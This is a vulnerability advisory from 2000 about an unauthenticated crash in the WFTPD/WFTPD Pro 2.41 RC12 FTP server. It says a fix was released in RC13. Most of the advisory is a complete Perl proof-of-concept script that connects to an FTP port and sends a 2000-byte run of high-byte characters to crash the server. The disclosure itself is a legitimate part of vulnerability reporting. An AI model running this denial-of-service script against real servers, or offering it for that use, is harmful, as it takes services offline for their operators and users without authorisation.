================================================================= Blue Panda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC12 05/09/2000 (dd/mm/yyyy) bluepanda@dwarf.box.sk http://bluepanda.box.sk/ ================================================================= Problem: WFTPD will crash if a large string consisting of characters 128-255 is received. A valid user/pass combination is not required to take advantage of this flaw. Vulnerable: WFTPD/WFTPD Pro 2.41 RC12 and prior. Immune: WFTPD/WFTPD Pro 2.41 RC13. Vendor status: Notified. A fix has been released. =================== Proof of concept: =================== #!/usr/bin/perl # # WFTPD/WFTPD Pro 2.41 RC12 denial-of-service # Blue Panda - bluepanda@dwarf.box.sk # http://bluepanda.box.sk/ # # ---------------------------------------------------------- # Disclaimer: this file is intended as proof of concept, and # is not intended to be used for illegal purposes. I accept # no responsibility for damage incurred by the use of it. # ---------------------------------------------------------- # # Sends WFTPD string consisting of characters > 127, causing it to crash. # use IO::Socket; $host = "ftp.host.com" ; $port = "21"; $sleepfor = 4; print "Connecting to $host:$port..."; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n"; print "done.\n"; $buffer = "\x80" x 2000; print $socket "$buffer\n"; $counter = 0; print "Sleeping for $sleepfor seconds."; while($counter < $sleepfor) { sleep(1); print "."; $counter += 1; } print "\n"; close($socket);